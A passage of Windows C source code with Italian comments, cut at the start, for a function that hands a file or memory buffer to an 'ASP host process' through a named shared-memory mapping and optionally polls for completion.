	HANDLE hfile = INVALID_HANDLE_VALUE; // Se filename e' NULL, mappa su file di paging
	DWORD mem_size = data_size; // Se filename e' NULL, mappa data_size byte in sharedmem

	// Controlla che il processo host ASP sia ancora aperto e che non stia
	// gia' eseguendo delle operazioni
	if (!ASP_HostProcess || !ASP_IPC_command || ASP_IPC_command->status != ASP_NOP)
		return FALSE;

	// Controlla che ci sia qualcosa da spedire
	if (!filename && !in_buf)
		return FALSE;

	ASP_IPC_data = NULL; // Lo inizializza solo per paranoia (se non viene rispettato l'ordine di chiamata delle funzioni)

	if (filename) {
		// Se filename e' settato, inizializza le variabili per
		// mapparlo.
		if ( (hfile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) ==  INVALID_HANDLE_VALUE )
			return FALSE;

		mem_size = 0; // mappa tutto il file
		data_size = GetFileSize(hfile, NULL); // setta quanti byte deve inviare (tutto il file)
	} else if (data_size == 0) // Se e' settato in_buf controlla che ci siano dati da spedire
		return FALSE;

	hASPIPCdatafile = CreateFileMapping(hfile, NULL, PAGE_READWRITE, 0, mem_size, SHARE_MEMORY_ASP_DATA_NAME);
	// hfile non serve piu' come handle (se filename e' settato)
	SAFE_CLOSE_HANDLE(hfile);

	if (hASPIPCdatafile)
		ASP_IPC_data = (BYTE *)MapViewOfFile(hASPIPCdatafile, FILE_MAP_ALL_ACCESS, 0, 0, mem_size);

	// Se non e' riuscito a creare il file mapping
	if (!ASP_IPC_data) {
		SAFE_CLOSE_HANDLE(hASPIPCdatafile);
		return FALSE;
	}

	// Se deve inviare un buffer di memoria, lo copia nella shared mem.
	// Se filename e' settato, ignora in_buf.
	if (in_buf && !filename) 
		memcpy(ASP_IPC_data, in_buf, data_size);

	// Istruisce l'host ASP per mandare i dati
	ASP_IPC_command->data_size = data_size;
	ASP_IPC_command->in_param = band_limit;
	ASP_IPC_command->action = ASP_WRITE;
	ASP_IPC_command->alt_param = 0;
	ASP_IPC_command->status = ASP_FETCH; // Per ultima cosa dice all'host ASP di fetchare il comando

	// Se e' bloccante aspetta un responso dall'host ASP
	if (blocking) 
		LOOP {
			DWORD ret_val;

			Sleep(ASP_SLEEP_TIME);
			ret_val = ASP_Poll(NULL);
			if (ret_val == ASP_POLL_FETCHING)
				continue;

			if (ret_val == ASP_POLL_ERROR)
				return FALSE;

			// Se ha tornato ASP_POLL_DONE allora esce
			// dal ciclo e ritorna TRUE
			break;
		}
	
	// Se la funzione e' blocking, ASP_Poll chiudera' tutto quello relativo alla 
	// shared memory. Altrimenti ci dovra' pensare il processo chiamando ASP_Poll
	return TRUE;
}
